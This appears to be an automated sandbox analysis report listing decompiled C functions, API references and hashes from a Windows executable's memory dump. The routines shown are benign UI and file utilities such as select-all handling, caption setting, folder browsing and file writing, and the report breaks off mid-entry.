Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

0x00405e0a
0x00405e12
0x00405e18
0x00405e1c
0x00405e1e
0x00405e1e
0x00405e24
0x00405e2c
0x00405e2e
0x00405e44
0x00405e49
0x00405e4c
0x00405e4d
0x00405e68
0x00405e74
0x00405e74
0x00000000
0x00405e84
0x00405e8c

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

winsta.dll, xrefs: 00409A51
Y@, xrefs: 00409A46
WinStationGetProcessSid, xrefs: 00409A62

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x0040588e
0x0040588f
0x0040588f
0x00405892
0x00405896
0x004058a9
0x004058a9
0x004058ad
0x004058af
0x004058b5
0x004058b6
0x004058b9
0x004058c2
0x004058c3
0x004058c8
0x004058d2
0x004058d4
0x004058d9
0x004058e0
0x004058ea
0x004058ec
0x004058ed
0x004058f2
0x004058f9
0x00405902
0x00405898
0x00405898
0x0040589a
0x0040589c
0x004058a1
0x004058a2
0x004058a5
0x004058a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a7
0x00405912
0x00405915
0x0040591e
0x0040591e
0x00405907
0x0040590b

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

0x0040ad06
0x0040ad0a
0x0040ad0c
0x0040ad14
0x0040ad19
0x0040ad1f
0x0040ad23
0x0040ad27
0x0040ad2a
0x0040ad2d
0x0040ad34
0x0040ad3b
0x0040ad3e
0x0040ad44
0x0040ad48
0x0040ad4a
0x0040ad52
0x0040ad5a
0x0040ad64
0x0040ad65
0x0040ad6b
0x0040ad6c
0x0040ad73
0x0040ad76
0x0040ad7c
0x0040ad7c
0x0040ad7f
0x0040ad84

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00404a62
0x00404a6a
0x00404a6e
0x00404a71
0x00404a74
0x00404a92
0x00404a92
0x00404a76
0x00404a76
0x00404a87
0x00404a90
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a90
0x00404aa3
0x00404aa7
0x00404aa7
0x00404a94
0x00404a98

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
